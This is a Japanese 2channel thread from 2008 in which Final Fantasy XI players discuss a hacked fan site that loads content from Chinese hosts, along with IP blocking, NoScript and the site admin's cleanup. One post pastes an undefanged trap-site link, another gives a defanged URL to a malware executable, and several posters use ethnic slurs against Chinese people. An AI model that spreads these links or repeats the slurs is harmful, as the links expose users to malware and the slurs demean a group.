セキュリティソフトを掻い潜って来るんじゃ
一般人はひっかかってもしょうがないわ

459 :既にその名前は使われています:2008/04/29(火) 12:01:14.37 ID:OrYeYIjV
中華の中の人が、あたらしいトロイの木馬を作成中で、とりあえず Power by CNZZ
だっけ、そんな文字列を返すようにしてるだけかな、、、

いずれにせよ、注意をおこたらないようにしないと、、、

460 :既にその名前は使われています:2008/04/29(火) 12:01:46.74 ID:0FsK4unN
ルーターハック(笑)

461 :既にその名前は使われています:2008/04/29(火) 12:03:22.59 ID:v2PDDYFE
日本に対する犯罪は中国では愛国無罪で罪に問われません

462 :既にその名前は使われています:2008/04/29(火) 12:04:03.85 ID:WcBUBXPW
ノートン入れててもアカハックされた人ってどういうウィルスだったんだい

463 :既にその名前は使われています:2008/04/29(火) 12:04:47.65 ID:z/2uxOyX
>>455
13バイトって Power by CNZZ これの文字数?
返ってきた文字列の内容は確認してないのかな?

ところで powered by hoge とかならよくみるけど、
power by ってはじめてみた気がする

464 :既にその名前は使われています:2008/04/29(火) 12:05:05.30 ID:D8TSIt5C
カスペでスキャンしてもひっかからなかったんだが大丈夫なのかな?

465 :既にその名前は使われています:2008/04/29(火) 12:06:02.69 ID:VL+cDIeX
>>35
伝説のハッカー早くきてー。
ていうか何した人なんだ?

466 :既にその名前は使われています:2008/04/29(火) 12:08:26.02 ID:VVoV0fQs
>>454
なるほど、俺は詳しくないんで全て更新しちゃってるな。

467 :既にその名前は使われています:2008/04/29(火) 12:09:14.16 ID:/I9Iv+3w
>>465
その昔中華の作ったウィルスサイトをハックして
TOPをぽこたんAAで飾った伝説の人

468 :既にその名前は使われています:2008/04/29(火) 12:10:25.56 ID:DiUp5gyG
ルータハックなんて、パス抜きスクリプト埋め込みにひっかかる可能性から
比べたらゴミみたいなもんだ。

FONみたいな腐ったルータぐらいじゃね? 簡単に落とせるのは

469 :既にその名前は使われています:2008/04/29(火) 12:11:30.67 ID:OrYeYIjV
>>463
うん、そう。 Power By CNZZ だったかな、そんな文字列しかかえってこなかった。
そうなんだよ、 Powered By ならわかるけど、 Power by ってところが気になるw

470 :既にその名前は使われています:2008/04/29(火) 12:12:10.44 ID:W25uR43K
>>455
確認乙w
現時点ではそんなもんだけど、参照先の中身変えればどうなるかわからんし
とりあえずサブネットごとルータで弾くようにしといた(´w`)y-〜

471 :既にその名前は使われています:2008/04/29(火) 12:13:31.91 ID:z/2uxOyX
Power By CNZZ ぐぐってみたらいっぱい出てきたw
検索結果のサマリをみると、中国語っぽいのやら記号っぽいのばっかり
興味あるけどこわくて踏めないw

472 :既にその名前は使われています:2008/04/29(火) 12:13:55.07 ID:LFwAehDm
FireFox初めて使ったけどさ、リンク開くときに
新しいタブで開いてくれないのがイカつく。
設定できないの、これ?

473 :既にその名前は使われています:2008/04/29(火) 12:14:39.65 ID:tZrRKq9a
ウイルス報告無しか
SQLインジェクションかな?
穴のプログラムなんか作るなよ

474 :既にその名前は使われています:2008/04/29(火) 12:16:43.53 ID:nX9Qv0rY
>>464
中華サイト読んでるだけで明確な悪さしてないからな、ひっかっかりようがない
データ収集くさいねこれ

475 :既にその名前は使われています:2008/04/29(火) 12:16:43.93 ID:z/2uxOyX
>>472
ツール→オプション→タブ
「新しいページは次の場所に開く」で「新しいたb」

476 :262:2008/04/29(火) 12:18:23.58 ID:XkyZsVru
>>455
確認あり。
今後、何かするために、情報収集だけしてるのかね。
今回、踏んじゃった人も、とりあえず、安心かな。

まあ、このスレ見てて、サーバ側消したとかもありそうだけど。
目的がいまいち分かんないね。


477 :既にその名前は使われています:2008/04/29(火) 12:18:54.11 ID:KjnLi3K5
>>472
記憶曖昧だけど、リンクを新しい窓で開くかは、そのサイトのhtmlで指定してあるんじゃなかった?
あと、TabMixPlusというアドオン入れたら常に新しいタブで開けるし、いろいろ便利。

478 :既にその名前は使われています:2008/04/29(火) 12:19:58.16 ID:on6tRafL ?2BP(366)
>>472
ホイールのクリック使え

479 :既にその名前は使われています:2008/04/29(火) 12:20:15.04 ID:9cC5HN3C
兵器、銃、映画、アニメ、ミュー...  投稿者:(´・ω・`) 投稿日:2008/04/29(Tue) 12:14 No.74432
えー兵器、銃、映画、アニメ、ミュージックの雑談です。この項目に関連してたらなんでもかまいません
http://yy65.60.kg/sddjo/

Photo2とかFC2ブログとかで頻繁にこれみるけど、なんだこれ???
怖くて踏んでない

480 :既にその名前は使われています:2008/04/29(火) 12:20:52.99 ID:z/2uxOyX
>>472
>>477
ごめん勘違いだった。リンク開くときか
リンクをホイールクリック、でいいんじゃないかな

481 :既にその名前は使われています:2008/04/29(火) 12:21:10.09 ID:W25uR43K
>>477
新しい窓で開くか現在の窓で開くかじゃなくて
ウィンドウで開くかタブで開くかの話じゃねw

482 :既にその名前は使われています:2008/04/29(火) 12:22:41.68 ID:wQ5uMnV3
ブラウザの設定もできない馬鹿に飴与えるなよw

483 :既にその名前は使われています:2008/04/29(火) 12:22:46.52 ID:W25uR43K
あれ、違ったのか(´・ω・`)

484 :既にその名前は使われています:2008/04/29(火) 12:24:38.65 ID:AovPKs17
479のアドが危ないのか知らないが微妙だったらアドレスの一部は潰そうぜ。
踏む人もいるかもしれないから。


485 :既にその名前は使われています:2008/04/29(火) 12:25:23.90 ID:VpmnC4n8
ハック!ハック!そこにハック!

486 :既にその名前は使われています:2008/04/29(火) 12:27:18.52 ID:LFwAehDm
>>475

神現る('∇')
今日のキミはモテモテだよ。多分。

>>478

ホイールクリックすんの面倒じゃんw
押し心地悪いし。
ちょっとズレたとこクリックしちゃうと
ギャンの顔みたいの出てくるし(´・ω・`)

487 :既にその名前は使われています:2008/04/29(火) 12:29:31.02 ID:+eVL7MwA
>>479
垢ハックスレにも似たようなの張られてるが、罠だろ?
こういうとこで一部潰さずURL出す奴は中華病夫だろが。

488 :既にその名前は使われています:2008/04/29(火) 12:29:38.08 ID:kzjhWcCh
正直、技術的なことはここより業者の垢ハック本スレ行ったほうがいい

489 :既にその名前は使われています:2008/04/29(火) 12:30:15.86 ID:xelVa9Nv
 |
<+> こんな顔?

490 :垢ハック対策スレから転載/現在の垢ハック対策スレはNo.18:2008/04/29(火) 12:32:49.28 ID:e6Y77/y1
557 名前:既にその名前は使われています 投稿日:2008/04/29(火) 12:22:59.81 ID:73kShD9i
d
もっと詳しく知りたい奴はここ見てくれ
●● RMT業者の垢ハックが多発している件14 ●●
hxxp://yy65■60■kg/monci/


558 名前:既にその名前は使われています 投稿日:2008/04/29(火) 12:25:38.59 ID:fpfRw6PT
>>557
あやしいな


559 名前:既にその名前は使われています 投稿日:2008/04/29(火) 12:27:42.11 ID:Z3l+N2CB
>>??557はimgタグに危険なURLを仕込んだ罠サイト

逆引き不可 Booで撃墜
Good bye 0000
Thank you. Wow taste good!

491 :既にその名前は使われています:2008/04/29(火) 12:32:49.34 ID:+eVL7MwA
>>479
は踏んではいけない。垢ハックスレにも張られてるの速攻罠と診断されてる。
こういうの張る奴処罰できねーのかね。

492 :既にその名前は使われています:2008/04/29(火) 12:33:13.11 ID:OrYeYIjV
>>474 >>476
うん、いまはまだデータ収集だけかもしれないね。

>>459 でも書いたけど、今はたんなるテキストだけだけど、これからトロイの
木馬をダウンロードさせるようになるかもしれないから、注意だねぇ。

>>470 のとおり、 222.77.0.0/16 はルータとかファイアウォールとかで
はじいちゃったほうが楽かもしれんね。

調べてみたけど、 222.77.0.0/16 は中国アドレスみたいだね。
222.76.0.0 - 222.79.255.255 は中国に割り当てられてるやつみたいよ。

493 :既にその名前は使われています:2008/04/29(火) 12:36:44.71 ID:XkyZsVru
詳しく見てないけど、>>479 のリンクヤバイと思う。

ttp://www●jplineage●com/ss.exe

が仕込まれてるぞ。
前のレスで書いた、IMGタグの奴。

494 :既にその名前は使われています:2008/04/29(火) 12:37:37.48 ID:QICTtHxo
一般人に出来るのは
Winの自動更新をする
店員や知人に進められたメジャーなセキュリティソフトの導入&更新
大概はここまで。

ブラウザの設定?何ですか?ってレベルの人が大半
当然ブラウザはIEだろうしw


495 :既にその名前は使われています:2008/04/29(火) 12:38:17.79 ID:AtT2amv0
グーグルバーからググルと いま見てるタブに検索結果が出てくるのどーにかなんねーかな
新タブに表示してくれると助かるんだけど

496 :既にその名前は使われています:2008/04/29(火) 12:38:45.70 ID:WcBUBXPW
ネットチェッカーがブラックに反応した理由ってなに
サイト行った人でもまだウィルスには犯されてはないって事でOK?

497 :既にその名前は使われています:2008/04/29(火) 12:40:27.34 ID:z/2uxOyX
>>492
APNIC で lookup してみた
ちゃいなねっと、とか、ちゃいなてれこむ って書いてあるな
住所は北京っぽいw

498 :既にその名前は使われています:2008/04/29(火) 12:42:23.42 ID:z/2uxOyX
>>495
Firefoxのアドオンなら、検索ボックスの設定で「検索結果を新しいタブに表示」ってあるけど

499 :既にその名前は使われています:2008/04/29(火) 12:43:45.06 ID:CzLurdKq
>>495
表示設定

500 :既にその名前は使われています:2008/04/29(火) 12:43:47.49 ID:tJSRB5j8
>>472
公式から下記のを検索してインスコ
http://www.mozilla-japan.org/addons/firefox/
スプリクト禁止 noscript

好みで
タブ Tab Mix Plus
広告を消す Adblock


501 :既にその名前は使われています:2008/04/29(火) 12:44:22.64 ID:W25uR43K
>>496
いまさっき確認した時点ではそうだけど
それ以前の状態と今後のことは不明ねw

502 :既にその名前は使われています:2008/04/29(火) 12:44:45.97 ID:CzLurdKq
ではできないのね

503 :既にその名前は使われています:2008/04/29(火) 12:44:46.60 ID:GvaCD8m6
>>492

記載のIPを、PG2ならローカルにリスト作成して、ブロックリストに追加すればいいのかな?

名前:糞シナ  開始IP:222.76.0.0  終了IP:222.77.255.255

みたいな感じでおk?


504 :既にその名前は使われています:2008/04/29(火) 12:44:52.46 ID:WcBUBXPW
チャイナネットとか
FF関係じゃなくてもよく攻撃されてたよ昔の話だけど

505 :既にその名前は使われています:2008/04/29(火) 12:46:20.09 ID:tJSRB5j8
>>503
日本語表記は不具合でる可能性あるらしいので糞シナは横文字で。

506 :既にその名前は使われています:2008/04/29(火) 12:48:06.37 ID:x4+s6SoQ
宝探し関連で愛用者がいるココは大丈夫だろうか。

>チョコボの宝探しをお手伝いさん
>ttp://conflict.s66.xrea.com/dig.html

507 :既にその名前は使われています:2008/04/29(火) 12:48:23.44 ID:AtT2amv0
>>498
>>499
サンクスコ
だけど表示設定ってどこにあんだーー

508 :既にその名前は使われています:2008/04/29(火) 12:49:53.10 ID:OqePFS4f
>>494
その自動更新を切ってるやつがいるんだよ
手動で定期的にやるならいいけど、それもしない

自動更新はじまると重くなるから切った
更新してなくても使えてるしいいじゃん

そんな返事が普通に多い
そしてウィルス対策も一切なにもしてないとかなんだよね

509 :既にその名前は使われています:2008/04/29(火) 12:51:40.41 ID:VpmnC4n8
ファック

510 :既にその名前は使われています:2008/04/29(火) 12:52:52.19 ID:z/2uxOyX
>>507
ツール→アドオンでダイアログが開くから、[拡張機能]タブを選択
Google Toolbar for Firefoxがあるからそれを選択して[設定]ボタン
またダイアログが出てくるから、[機能]タブを選択
[検索ボックスの設定]ボタンを押すとまたダイアログが出てくるので
そこの[検索結果を新しいタブに表示]をチェック

これで無理ならオレにはもう説明できないw


511 :既にその名前は使われています:2008/04/29(火) 12:53:00.94 ID:AtT2amv0
自己解決したーー
みんな愛してる

512 :既にその名前は使われています:2008/04/29(火) 12:53:17.06 ID:fH6K2Hum
>>494
ちょっと前のfc2ブログの騒ぎの時は全く何もしていないのが一般人だと主張されていたよ。
win自動更新もしない。
プリインストールのセキュリティソフトすら使わない。
セキュリティについて店員に尋ねない。
このうちの一つでもしてしまうとヲタだと主張する奴が複数いた。
このご時世にそれすらしてないのは馬鹿で、一般人レベルなら>>494程度はこなして当然だとは思うけど
そうじゃないみたいだよ?
こうして馬鹿のせいで被害が広がっていくんだね。
怖い怖い…

513 :既にその名前は使われています:2008/04/29(火) 12:53:39.92 ID:+eVL7MwA
>>508
そういう奴身近にいたから困る…。煽って対策させたからいいけど。
そういう奴でハックされたら馬鹿と言われても仕方ねーよなぁ。

514 :既にその名前は使われています:2008/04/29(火) 12:53:42.96 ID:XkyZsVru
>>503
リネージュ資料室の危険IPリストの[ cn.txt ]を設定してるなら、
既に入ってるから、再設定しなくてもいいかも。

cn.txt
China:222.76.0.0-222.79.255.255


515 :既にその名前は使われています:2008/04/29(火) 12:54:11.60 ID:lvAZxCXr
ははは、FF11やってるのが一般人の分けないじゃないか

516 :既にその名前は使われています:2008/04/29(火) 13:00:07.75 ID:rr1ZDfxf
>>511
自己解決じゃねーだろwwwwwwwwwwwwwwwwwwwwwwwwwwww

517 :既にその名前は使われています:2008/04/29(火) 13:00:34.21 ID:uPdaZYAc
なんかタイミング的にWINXP SP3で追加された
マイクロソフトが施した新規の虚弱性対策とかを汲み取って作った攻撃法なんじゃね?
とか考えちまうな。

まぁWINをきっちりVerUPしてれば今すぐSP3じゃなくても問題ないとは思うが・・・

518 :既にその名前は使われています:2008/04/29(火) 13:01:48.86 ID:Z0ShMQ/O
>>515
オタクも一般人なわけなんだがw

519 :既にその名前は使われています:2008/04/29(火) 13:02:09.51 ID:GvaCD8m6
>>505

トンクス。
「KUSO China:222.76.0.0-222.77.255.255」 でうまく登録できた
確かにヴァナモンページが、上記ブロックリストでバリバリ反応してるなぁ

Firefoxも、アドオンでNoScript導入して「<IFRAME>の禁止」にチェックつけとかないと
スルーしてくるってのは盲点だった。

既にPOLパスワード変更済みだけど、一度は踏んでしまったので、ノートン先生だけじゃ
かなり心配なのでカスペでスキャンしてきま〜

ホントこのスレで確認出来て助かりますたわ

520 :既にその名前は使われています:2008/04/29(火) 13:03:21.21 ID:CzLurdKq
正直、読み間違えたんだけど解決したようでなによりw

【韓国 中国大好き】PeerGuardian 24【YBB大好き】
http://tmp7.2ch.net/test/read.cgi/download/1208186653/8のやつ使っても

ChinaIP:222.16.0.0-222.95.255.255

で防いでるよね?

521 :既にその名前は使われています:2008/04/29(火) 13:06:37.26 ID:OqePFS4f
>>514
そのとおり、リネ資料室のCNを設定してブロックしてあれば新たな設定は不要
ちなみに自分の場合はそれで設定し、昨日の昼間にヴァナモンみていた
ブロックの記録に件のIPを弾いた記録があったな


522 :既にその名前は使われています:2008/04/29(火) 13:07:53.13 ID:9cC5HN3C
479だがアドレス削除して貼るの忘れてた、スマポ

やっぱ罠なのか、なんかFC2ブログのコメントのとこで大抵書き込んであるんだよなコレ…

523 :既にその名前は使われています:2008/04/29(火) 13:09:41.40 ID:OqePFS4f
>>522
そんな書き込みは全て罠だと思っていればいい

524 :既にその名前は使われています:2008/04/29(火) 13:14:04.42 ID:tJSRB5j8
>>512
それは一般人じゃなくて馬鹿だと思われ。

525 :既にその名前は使われています:2008/04/29(火) 13:19:35.39 ID:CzLurdKq
>>512
最近のコソアンttp://find.2ch.net/enq/result.php/22568/l50調べでも
導入率が70%しかだもんねぇ

526 :既にその名前は使われています:2008/04/29(火) 13:26:35.95 ID:/5/JVPWZ
ヴァナモンってなんかおかしいよな・・・・
ブログの時、仕込まれてたウィルスが勝手に消されてたんだっけ?
あれは結局なんだったんだ

527 :既にその名前は使われています:2008/04/29(火) 13:29:36.65 ID:lekLbtDV
JavaScript切るといろいろ面倒なのよなあ・・・
最近は使ってる企業関係多いし・・・
昔は常時切ってても問題なかったけど


528 :既にその名前は使われています:2008/04/29(火) 13:30:45.27 ID:OqePFS4f
仕込まれて撒き散らした後、また消された
管理人の知らぬ間に!

イミフ


529 :既にその名前は使われています:2008/04/29(火) 13:33:34.27 ID:hfXzCGjY
>>526
管理人に気づかれずに長期利用するためとかじゃね?

530 :既にその名前は使われています:2008/04/29(火) 13:34:40.34 ID:xoxNwdCD
>>512
一般じゃなくても原発のデータ流出させる位の認識だしなー

俺もFF11位しかPCだしっていうのでウィンドウズアップデート、セキュリティソフト入れる、
IEエンジンソフトはギコナビ以外使わないwって位しかやってないわ

つか自分のPC調べてたら結構やばそうな状態になってたw
昨日の俺が言ってたゴブクラブのやつは直接は関係ないかもしれない

とりあえずクリーンインスコしてくるわ('A`)

531 :既にその名前は使われています:2008/04/29(火) 13:35:39.88 ID:AtT2amv0
>>529
なんという見事な寄生虫っぷり

532 :既にその名前は使われています:2008/04/29(火) 13:37:14.13 ID:iVTn03qt
>>527
見るページ毎に許可するしかないんじゃない?


533 :既にその名前は使われています:2008/04/29(火) 13:41:23.00 ID:P+JVKcFa
そうか?JS使わないと中身が把握できないなんてのは
糞会社以外ないと思うが。

どうしてもみたけりゃ信頼済みサイトに入れれば済む話

534 :既にその名前は使われています:2008/04/29(火) 13:42:58.44 ID:aoarpZrC
>>526
fc2 側がシステムの不備でハックされてたのを認めた
だから fc2 を利用していたところはいつでもどこでも
業者の好きなときに罠サイトにできた

535 :既にその名前は使われています:2008/04/29(火) 13:45:52.28 ID:CX2nTYf9
>>534
でもあそこだけなんだよな?
勝手に消されてたのって

536 :既にその名前は使われています:2008/04/29(火) 13:46:06.79 ID:vAJKWX/v
奴らからすれば利用できる物は何でも利用しようっていうスタンスだろうし
いろいろとねらってるんだろう。今回はその前段階かもしれんが

ただ、スキルが上がってるのはむこうだけじゃねえぞって事だな

JavaScriptも最初切ってると違和感あったが、なれてくると
まあ何とかなってきた

537 :既にその名前は使われています:2008/04/29(火) 13:46:35.42 ID:wzizoZUw
昨日、ヴァナモンみてPGで219.232.241.141っていうのがブロックされてるんだけどこれ?

538 :既にその名前は使われています:2008/04/29(火) 13:47:30.87 ID:iVTn03qt
>>537
>>383見る限りそれっぽいかな?

539 :ヴァナm ◆ZrzGMHfgII :2008/04/29(火) 13:49:22.80 ID:usez71CN
完全にハックされてるが普通に考えてヤバい。想定外
ブログとは全く違うパスワードなのに
4/27 23:26-23:31の間に3つのファイルが書き換えられていた。
該当の3ファイルは今削除した
接続パスワードは変更されていなかった。
ちなみにFC2のブログは数日前に停止した。
xreaにメール送る

540 :既にその名前は使われています:2008/04/29(火) 13:49:40.59 ID:tJSRB5j8
>>535
感染が露見したサイトではって注釈が付く、どれだけ感染してたのか誰も把握できて
ない。
それとここにも業者の目があるから、あんとき大騒ぎしたので引っ込めた可能性が大。

541 :既にその名前は使われています:2008/04/29(火) 13:50:36.17 ID:iVTn03qt
>>539
お、やっと来たw


542 :既にその名前は使われています:2008/04/29(火) 13:51:19.25 ID:lekLbtDV
>>539
本人か
状況的にやばいのでトップに説明出すとかしたほうがいいかと


543 :既にその名前は使われています:2008/04/29(火) 13:52:46.25 ID:tJSRB5j8
>>539
お、対策したんですな。
非常に有用なサイトなのでめげずに頑張ってくだされ。


しかし丸一日近く誰も気がつかなかったのかw
数時間のみハックとかやりかねんからこれからめんどいのう。

544 :ヴァナm ◆ZrzGMHfgII :2008/04/29(火) 13:52:46.58 ID:usez71CN
>>526
それはマジなんだ
どうやらFC2の運営が気づいて除去したっぽい
メールしたらFC2がそのような対応をしていたって記事を
ハックされた他のFC2ブログ主が書いていたのを読んだ
(メールしたところ、そちらに仕込まれていたiframeは運営で除去しました
という返答が来た って感じの内容だったと思う)

545 :既にその名前は使われています:2008/04/29(火) 13:53:39.47 ID:iVTn03qt
_______/ ̄\____
俺●→    ←●トラック
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
_______/ ̄\____
      トラック●   ●俺
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
_______/ ̄\____
          ●   ●
       |    ( _●_)  ミ

   ∩___∩
   | ノ      ヽ
  /  ●   ● | クマ──!!
  |    ( _●_)  ミ
 彡、   |∪|  、`\
/ __  ヽノ /´>  )
(___)   / (_/

このぐらい想定外ってことか

546 :既にその名前は使われています:2008/04/29(火) 13:54:25.32 ID:aoarpZrC
>>535
消したのは fc2 側じゃないかと個人的には思ってるんだけどね
悠長に対策して効果を確認してからはじめて「不正ログイン対策対応状況につきまして」とか
発表する様ないい加減なところだし
まともなところならサービスを止めてから対策するよ

547 :既にその名前は使われています:2008/04/29(火) 13:54:33.43 ID:iVTn03qt
>>543
イヤなヒットアンドアウェーだなw

548 :既にその名前は使われています:2008/04/29(火) 13:55:32.26 ID:wQ5uMnV3
管理人キターーーーーーーー

549 :既にその名前は使われています:2008/04/29(火) 13:55:44.72 ID:qYRRo/4o
今エリア別モンスページをNoScriptの右クリックで確認したらcnzz●comがリストに出なくなってるね
改竄ファイル削除乙(´・ω・`)

550 :既にその名前は使われています:2008/04/29(火) 13:55:49.22 ID:aoarpZrC
と思ったらばなもんの中の人が
やっぱ消したのは fc2 か

551 :既にその名前は使われています:2008/04/29(火) 13:57:09.96 ID:WcBUBXPW
お、乙
いってみるか

552 :既にその名前は使われています:2008/04/29(火) 13:57:10.73 ID:wQ5uMnV3
管理人乙(´・ω・`)

553 :既にその名前は使われています:2008/04/29(火) 13:58:26.13 ID:iVTn03qt
ってかxreaの方のパスが抜かれたのか?
それとも別の方法で抜けてったのか?

どっちにしろ問題だなぁ

554 :既にその名前は使われています:2008/04/29(火) 14:00:07.01 ID:vAJKWX/v
ファイル消されてるからか、エリア選択だとカンパニ、アトルガンジラとかの選択が表示されね(苦笑)
まあ、そのぶん消したのが一目でわかるけど

555 :既にその名前は使われています:2008/04/29(火) 14:00:38.95 ID:wzizoZUw
上の方に出てる222.77.187.187ってIPには接続して無いっぽい
219.232.241.141に接続しようとしてブロックしたログが残ってるだけかな

念のためPS2からパスワード変更、カスペルスキーでウィルススキャン中

556 :既にその名前は使われています:2008/04/29(火) 14:01:02.32 ID:WcBUBXPW
で、結局サイト踏んでた人はどうすればいいのかな

557 :既にその名前は使われています:2008/04/29(火) 14:03:10.35 ID:N1EAiSum
ヴァナモンは業者の巣窟ジョブ板がホームグラウンドなんだぞ?
後は分かるよな。

558 :既にその名前は使われています:2008/04/29(火) 14:03:29.04 ID:WcBUBXPW
管理人さんはどこの鯖でFF[やってんの

559 :既にその名前は使われています:2008/04/29(火) 14:04:01.72 ID:OqePFS4f
>>555
PG2いれてブロックしてるんだから、ブロックしたという履歴があるなら繋がってないんじゃねの?


560 :既にその名前は使われています:2008/04/29(火) 14:04:12.74 ID:vAJKWX/v
>>557
糞ガル板にかえれw

561 :既にその名前は使われています:2008/04/29(火) 14:04:43.91 ID:iVTn03qt
>>559
だから「念のため」と書いてあるんだろう

562 :ヴァナm ◆ZrzGMHfgII :2008/04/29(火) 14:07:01.14 ID:usez71CN
>>557
ネ実をホームグラウンドにしたらスレが1時間持たないだろ!

563 :既にその名前は使われています:2008/04/29(火) 14:07:15.36 ID:tJSRB5j8
>>560
あの板まだあるの?w

564 :既にその名前は使われています:2008/04/29(火) 14:09:07.34 ID:+GNBdofq
>>562
どんな糞スレでも3時間はもつよ!

もつよ!!

565 :既にその名前は使われています:2008/04/29(火) 14:09:49.75 ID:OqePFS4f
>>562
とりあえずお疲れ様


566 :既にその名前は使われています:2008/04/29(火) 14:10:31.59 ID:18lv04K1
>>562
こんなとこで暴れてる暇があるならサイトのトップページの一番上に
この騒動の文章をかけよ。
サイト管理者として少しはそれらしいことしろ。


567 :既にその名前は使われています:2008/04/29(火) 14:11:31.94 ID:vAJKWX/v
>>563
無かったw

568 :ヴァナm ◆ZrzGMHfgII :2008/04/29(火) 14:12:18.83 ID:usez71CN
>>566
今やってるところだよ!

569 :既にその名前は使われています:2008/04/29(火) 14:12:32.21 ID:vAJKWX/v
>>566
ひとまず罠消すのが先だろ

むしろここに来て状況説明しつつ平行でやってくれた方がありがたい

570 :既にその名前は使われています:2008/04/29(火) 14:14:18.12 ID:OqePFS4f
>>566
言いたい事はわかるけど(・_・;)

トップページに今回の件のことも書いてください

とか、そんな風に書こうよ

571 :既にその名前は使われています:2008/04/29(火) 14:14:19.04 ID:odOqoiLE
>>569
>>539

572 :既にその名前は使われています:2008/04/29(火) 14:15:12.93 ID:CWj21EDJ
>>569
>>539

573 :既にその名前は使われています:2008/04/29(火) 14:15:13.30 ID:iVTn03qt
>>569
スレ嫁

574 :既にその名前は使われています:2008/04/29(火) 14:15:34.49 ID:mQ4+jJri
もうサイトの防御手段はフリーチベットやら天安門やら見えないよう
仕込むくらいしかねえんかねえ。

中国公安がそこまでチェックしてるかが都市伝説だが。

575 :既にその名前は使われています:2008/04/29(火) 14:16:40.31 ID:u2FBo7mq
ヴァナモンがんばれ!
今回はちょっと根が深いがそれでも俺は応援するぜ!
今までも今でもこれからもお世話になるサイトだしね

576 :既にその名前は使われています:2008/04/29(火) 14:17:37.88 ID:nE6TwJh6
管理人がこんなに頑張ってくれても防ぎようがないなんて
もうPC新調するかXbox買うかした方がいいのかねぇ

577 :既にその名前は使われています:2008/04/29(火) 14:18:04.27 ID:18lv04K1
消すのが先じゃなく、パスワードなどの変更後まずはサイトを閉鎖するのが先だ。
これ以上被害に合う人を無くす。こんなの5秒もあれば出来るんだから。
その上で書き換えられたファイルの復旧やサーバーログなどの調査。
と言うか日本語ページしかないんだから.jp以外アクセスをはじけばいい。
サイトを見れなきゃハックしようとも思わないんだから。


578 :既にその名前は使われています:2008/04/29(火) 14:18:07.92 ID:Fl50nsRB
俺ここ数ヶ月お金はらってないんだけど、それだったらパスとか抜かれてもインできないから兵器だよな
というかキャラ消えてるかもしれん

579 :既にその名前は使われています:2008/04/29(火) 14:18:47.25 ID:yB4H6Nq8
というか普段利用させてもらってるのに
こういうことが起こると>>566みたいな態度取る奴は
大抵ニート。

580 :既にその名前は使われています:2008/04/29(火) 14:19:09.37 ID:OqePFS4f
>>576
PC新調しても踏んじゃったら同じだろう('A`)


581 :既にその名前は使われています:2008/04/29(火) 14:19:30.79 ID:P/383H9T
>>570
そんな風に書ける奴はあんなふうには書かないし、
これからも書かないし、それで悪印象をもたれようとお構いなしなんで、
無駄ですよ。
骨折り損に終わるんで、精神衛生上良くないです。やめときな。

582 :既にその名前は使われています:2008/04/29(火) 14:19:36.69 ID:aoarpZrC
>>571-537
俺には>>539を読んだ上で、それで
>むしろここに来て状況説明しつつ平行でやってくれた方がありがたい
つってるようにしか読めなかったが

583 :既にその名前は使われています:2008/04/29(火) 14:20:29.91 ID:OqePFS4f
NGでよろしく
ID:18lv04K1

584 :既にその名前は使われています:2008/04/29(火) 14:20:30.52 ID:vAJKWX/v
>>573
ただ騒いでるとか言ってるから順番の話を書いただけだw

まあ勢いで書いてるときはこういう事もある

585 :既にその名前は使われています:2008/04/29(火) 14:20:55.16 ID:lvAZxCXr
>>580
FF専用PCってことだろ

586 :582:2008/04/29(火) 14:20:58.59 ID:aoarpZrC
うはアンカー間違ったw

587 :既にその名前は使われています:2008/04/29(火) 14:20:59.83 ID:iVTn03qt
>>582
意味のわからないアンカーつけるんじゃねぇ
俺がレスしたクマーが出てきて驚いただろ

588 :既にその名前は使われています:2008/04/29(火) 14:21:05.10 ID:OrYeYIjV
>>568
さすがに、2回もクラックされるなんて、ちょっとやばくない?
前回のクラックされた原因とか何だったの?原因とほどこした対策とか
まとめたページとかある?

今回もちゃんとクラックされた原因を調べて、流出口をふがないとまずいんじゃない?
対症療法じゃなくてさ。

手にあまるようだったら、このスレで相談にのることくらいできるよ。

589 :既にその名前は使われています:2008/04/29(火) 14:21:10.83 ID:18lv04K1
>>579
君は何もアドバイスも出来ないくせに文句しかいえないんだろ?


590 :既にその名前は使われています:2008/04/29(火) 14:21:39.10 ID:B+FyjPLx
休日でも油断大敵、ヴァナモンさん><;

591 :既にその名前は使われています:2008/04/29(火) 14:22:09.22 ID:AmYvAT1o
>>587
おなじくw

592 :既にその名前は使われています:2008/04/29(火) 14:22:27.63 ID:qAY9l5uD
中国人って本当にろくなことしないな。

593 :既にその名前は使われています:2008/04/29(火) 14:22:45.91 ID:OSHEaR6E
ID:18lv04K1
なんでそんなに上からモノ言うんだ?

594 :既にその名前は使われています:2008/04/29(火) 14:23:00.66 ID:vAJKWX/v
文句しか言ってない人が文句言う人に指摘してる、ふしぎ!

595 :既にその名前は使われています:2008/04/29(火) 14:23:08.10 ID:aoarpZrC
>>588
前回って blog のことか?
あれは fc2 のせいだっての

596 :既にその名前は使われています:2008/04/29(火) 14:23:14.98 ID:OqePFS4f
クマーw


597 :既にその名前は使われています:2008/04/29(火) 14:23:19.66 ID:CWj21EDJ
>>584
勘違いすまなんだ

>>588
前回はFC2の問題

598 :既にその名前は使われています:2008/04/29(火) 14:23:41.21 ID:mgEPfHyV
しかし、冗談抜きで、FF関連のHP怖くて見れないな・・・
PGや火狐でもなんか無駄になる日が近そうだ・・・
中国以外からやりだしたらきついな

599 :既にその名前は使われています:2008/04/29(火) 14:24:31.65 ID:iVTn03qt
>>588
前のはFC2が問題
今回はまだよくわからんが、パスが流出ってのはないだろう
xreaに何か問題があるのかもしんないしな


600 :ヴァナm ◆ZrzGMHfgII :2008/04/29(火) 14:25:39.95 ID:usez71CN
>>577
言語設定jp許可以外見れないように設定するわ

601 :既にその名前は使われています:2008/04/29(火) 14:25:56.91 ID:iVTn03qt
>>598
俺のバイオハザード4テンプレを見る分には安心だぜ
おっぱい6:攻略4で運営しております

602 :既にその名前は使われています:2008/04/29(火) 14:26:18.49 ID:aoarpZrC
>>588 の人気に /sit

603 :既にその名前は使われています:2008/04/29(火) 14:26:57.35 ID:mgEPfHyV
>>600
乙。頑張ってください
しかしIDがCNだなw


604 :ヴァナm ◆ZrzGMHfgII :2008/04/29(火) 14:27:43.55 ID:usez71CN
>>588
前回はFC2の問題
今回は明らかに前回とはケースが違う
というか防ぎようないんじゃないの?ってくらいだ
だからxreaにメールして返答を待つしかない
とりあえずjp以外拒否だな

605 :既にその名前は使われています:2008/04/29(火) 14:28:21.39 ID:AmYvAT1o
ID:18lv04K1がツンデレに見えてきた。

606 :既にその名前は使われています:2008/04/29(火) 14:28:33.81 ID:aoarpZrC
usez71CN
うぜえ CN にみえなくもない

